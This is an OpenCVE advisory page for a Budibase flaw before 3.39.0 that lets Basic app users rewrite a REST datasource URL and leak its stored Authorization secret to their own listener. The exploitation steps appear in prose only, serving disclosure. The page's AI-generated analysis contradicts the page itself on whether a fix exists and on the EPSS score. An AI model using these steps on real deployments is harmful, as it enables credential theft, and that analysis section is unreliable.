Description
Budibase is an open-source low-code platform. Prior to 3.39.0, the single-datasource GET and PUT routes are guarded by generic TABLE READ, not by Builder/Admin permission or datasource-specific ownership/resource checks. The built-in Basic app user role maps to the WRITE permission set, which includes table read/write and query write. A Basic user can therefore read an existing REST datasource, receive redacted authConfigs values, submit an update that changes only config.url while keeping the redacted placeholders, and trigger an existing saved relative-path REST query. During update, mergeConfigs() restores the old stored secret when it sees the redaction placeholder. During query execution, Budibase prefixes the attacker-controlled datasource config.url to the relative query path and applies the resolved stored auth headers. The result is server-side disclosure of the builder-configured REST Authorization secret to an attacker-controlled listener. This vulnerability is fixed in 3.39.0.
Published: 2026-05-27
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A flaw in Budibase prior to version 3.39.0 allows a user with Basic app privileges to modify the base URL of a REST datasource while keeping redacted placeholders, causing the system to merge the original authentication configuration and then expose that confidential secret through an attacker-controlled listener when a relative query is executed.

Affected Systems

The vulnerability affects all installations of Budibase built with the open-source platform, specifically those running any version older than 3.39.0. Any instance that creates a REST datasource and grants Basic app users WRITE permissions is at risk.

Risk and Exploitability

With a CVSS score of 8.1 the risk is high, and although the EPSS score is not available and the vulnerability is not listed in KEV, the fact that Basic app users are typically plentiful makes exploitation likely. An attacker who has or can compromise a Basic app account can change the datasource URL to point to a malicious endpoint, trigger the stored query, and receive the stored authorization headers, enabling credential exfiltration.

Generated by OpenCVE AI on May 27, 2026 at 21:03 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Budibase to version 3.39.0 or newer to apply the fix that restricts permissions on data source routes.
  • Disable or restrict the ability for Basic app users to create or modify REST datasources, ensuring proper permission checks or removal of WRITE rights.
  • Audit existing instances for exposed datasource URLs and credential leakage and apply the necessary configuration changes.

Generated by OpenCVE AI on May 27, 2026 at 21:03 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 28 May 2026 02:30:00 +0000

Type Values Removed Values Added
First Time appeared Budibase
Budibase budibase
Vendors & Products Budibase
Budibase budibase

Wed, 27 May 2026 20:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 27 May 2026 17:45:00 +0000

Type Values Removed Values Added
Description Budibase is an open-source low-code platform. Prior to 3.39.0, the single-datasource GET and PUT routes are guarded by generic TABLE READ, not by Builder/Admin permission or datasource-specific ownership/resource checks. The built-in Basic app user role maps to the WRITE permission set, which includes table read/write and query write. A Basic user can therefore read an existing REST datasource, receive redacted authConfigs values, submit an update that changes only config.url while keeping the redacted placeholders, and trigger an existing saved relative-path REST query. During update, mergeConfigs() restores the old stored secret when it sees the redaction placeholder. During query execution, Budibase prefixes the attacker-controlled datasource config.url to the relative query path and applies the resolved stored auth headers. The result is server-side disclosure of the builder-configured REST Authorization secret to an attacker-controlled listener. This vulnerability is fixed in 3.39.0.
Title Budibase: Basic app users can exfiltrate stored REST datasource auth by rewriting datasource base URL
Weaknesses CWE-863
References
Metrics cvssV3_1

{'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}

Subscriptions

Budibase Budibase
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-27T18:41:12.772Z

Reserved: 2026-05-20T23:12:43.031Z

Link: CVE-2026-48152

cve-icon Vulnrichment

Updated: 2026-05-27T18:38:34.599Z

cve-icon NVD

Status : Deferred

Published: 2026-05-27T18:16:27.723

Modified: 2026-05-27T20:16:40.943

Link: CVE-2026-48152

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-28T02:15:03Z

Weaknesses